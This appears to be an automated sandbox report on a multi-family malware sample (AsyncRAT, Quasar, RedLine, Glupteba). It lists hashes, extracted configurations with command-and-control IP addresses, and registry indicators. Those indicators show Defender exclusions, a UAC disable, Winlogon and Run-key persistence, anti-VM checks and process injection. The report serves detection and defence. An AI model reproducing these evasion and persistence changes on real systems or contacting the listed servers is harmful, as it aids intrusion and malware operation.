asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 09:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

asyncrat glupteba quasar redline office04 spread discovery dropper evasion execution infostealer loader persistence rat rootkit spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

185.196.10.233:4782

Mutex

b0fcdfbd-bdd4-4a5d-8ab1-7217539d4db6

Attributes

encryption_key
0EC03133971030F6D05E6D59F71626F6543BBE65
install_name
gfdgfdg.exe
log_directory
Logs
reconnect_delay
3000
startup_key
fgfdhdgg
subdirectory
gfgfgf

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Spread

94.156.10.12:80

94.156.10.12:443

94.156.8.44:80

94.156.8.44:443

Mutex

B7T0vEfLYvgG

Attributes

delay
300
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba
Modifies WinLogon for persistence 2 TTPs 1 IoCs
persistence

Winlogon Helper DLL
T1547.004

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe, C:\\ProgramData\\Nul\\Null.exe," reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe, C:\\ProgramData\\Nul\\Null.exe,"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Windows Service

T1543.003

Modify Registry

T1112

Disable or Modify Tools

T1562.001

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar payload 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/6648-12204-0x0000000000400000-0x0000000000724000-memory.dmp family_quasar
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
RedLine payload 1 IoCs

Processes:

resource yara_rule

behavioral2/memory/528-12425-0x0000000000400000-0x000000000045C000-memory.dmp family_redline
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

svchost.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" svchost.exe

resource	yara_rule
behavioral2/memory/6648-12204-0x0000000000400000-0x0000000000724000-memory.dmp	family_quasar

resource	yara_rule
behavioral2/memory/528-12425-0x0000000000400000-0x000000000045C000-memory.dmp	family_redline

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	svchost.exe

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

svchost.exe288c47bbc1871b439df19ff4df68f076.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\svchost.exe = "0"	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	svchost.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

softcore-shd-lavacrypt.exesvchost.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions softcore-shd-lavacrypt.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions svchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	softcore-shd-lavacrypt.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	svchost.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
6120	powershell.exe
5240	powershell.exe
6516	powershell.exe
6216	powershell.exe
1716	powershell.exe
5652	powershell.exe
6160	powershell.exe
5580	powershell.exe
3188	powershell.exe
6436	powershell.exe
4760	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Looks for VMWare Tools registry key 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

softcore-shd-lavacrypt.exesvchost.exe

description ioc process

Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools softcore-shd-lavacrypt.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools svchost.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

4904 netsh.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

3936 attrib.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools	softcore-shd-lavacrypt.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools	svchost.exe

pid	process
4904	netsh.exe

pid	process
3936	attrib.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exesoftcore-shd-lavacrypt.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	softcore-shd-lavacrypt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	softcore-shd-lavacrypt.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4363463463464363463463463.exenet.exe288c47bbc1871b439df19ff4df68f00076.exesoftcore-shd-lavacrypt.exesvchost.exe.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	net.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	288c47bbc1871b439df19ff4df68f00076.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	softcore-shd-lavacrypt.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	.exe

Executes dropped EXE 24 IoCs

Processes:

ngrok.exenet.execrazyCore.exesoftcore-shd-lavacrypt.exesdp.exeBLHisbnd.exenet.exe288c47bbc1871b439df19ff4df68f00076.exeISetup4.exeqauasariscrypted.exe288c47bbc1871b439df19ff4df68f076.execp.exetest.exeBLHisbnd.exema.exesvchost.exeMSI.CentralServer.exe288c47bbc1871b439df19ff4df68f076.exe.execsrss.exece0b953269c74bc.exenine.exeTags.exeinjector.exe

pid	process
3256	ngrok.exe
4512	net.exe
4576	crazyCore.exe
3948	softcore-shd-lavacrypt.exe
2976	sdp.exe
852	BLHisbnd.exe
2352	net.exe
2964	288c47bbc1871b439df19ff4df68f00076.exe
4932	ISetup4.exe
924	qauasariscrypted.exe
3096	288c47bbc1871b439df19ff4df68f076.exe
460	cp.exe
4512	test.exe
5384	BLHisbnd.exe
5168	ma.exe
2844	svchost.exe
7032	MSI.CentralServer.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6288	.exe
3196	csrss.exe
5224	ce0b953269c74bc.exe
1188	nine.exe
4464	Tags.exe
5740	injector.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

288c47bbc1871b439df19ff4df68f076.exesvchost.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\svchost.exe = "0"	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	288c47bbc1871b439df19ff4df68f076.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

csrss.exesoftcore-shd-lavacrypt.exeqauasariscrypted.exe288c47bbc1871b439df19ff4df68f076.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "\"C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe\""	softcore-shd-lavacrypt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\qauasariscrypted = "\"C:\\Users\\Admin\\qauasariscrypted.exe\""	qauasariscrypted.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	288c47bbc1871b439df19ff4df68f076.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	svchost.exe

Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Maps connected drives based on registry 3 TTPs 4 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

softcore-shd-lavacrypt.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	softcore-shd-lavacrypt.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	softcore-shd-lavacrypt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	svchost.exe

Drops file in System32 directory 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

net.exeBLHisbnd.exeqauasariscrypted.exesvchost.exe.exece0b953269c74bc.exe

description	pid	process	target process
PID 4512 set thread context of 2352	4512	net.exe	net.exe
PID 852 set thread context of 5384	852	BLHisbnd.exe	BLHisbnd.exe
PID 924 set thread context of 6648	924	qauasariscrypted.exe	vbc.exe
PID 2844 set thread context of 4276	2844	svchost.exe	regasm.exe
PID 6288 set thread context of 4932	6288	.exe	vbc.exe
PID 5224 set thread context of 528	5224	ce0b953269c74bc.exe	RegAsm.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

288c47bbc1871b439df19ff4df68f076.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 288c47bbc1871b439df19ff4df68f076.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	288c47bbc1871b439df19ff4df68f076.exe

Drops file in Windows directory 3 IoCs

Processes:

cp.exe288c47bbc1871b439df19ff4df68f076.exe

description	ioc	process
File created	C:\Windows\Tasks\MSI.CentralServer.job	cp.exe
File opened for modification	C:\Windows\rss	288c47bbc1871b439df19ff4df68f076.exe
File created	C:\Windows\rss\csrss.exe	288c47bbc1871b439df19ff4df68f076.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

724 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

5044 2976 WerFault.exe sdp.exe
4632 2352 WerFault.exe net.exe
2576 4932 WerFault.exe ISetup4.exe
1540 1188 WerFault.exe nine.exe
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6136 schtasks.exe
5448 schtasks.exe
3104 schtasks.exe
4920 schtasks.exe
2156 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5720 timeout.exe
6104 timeout.exe

pid	process
724	sc.exe

pid	pid_target	process	target process
5044	2976	WerFault.exe	sdp.exe
4632	2352	WerFault.exe	net.exe
2576	4932	WerFault.exe	ISetup4.exe
1540	1188	WerFault.exe	nine.exe

pid	process
6136	schtasks.exe
5448	schtasks.exe
3104	schtasks.exe
4920	schtasks.exe
2156	schtasks.exe

pid	process
5720	timeout.exe
6104	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

288c47bbc1871b439df19ff4df68f076.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	288c47bbc1871b439df19ff4df68f076.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Runs net.exe
Runs regedit.exe 1 IoCs

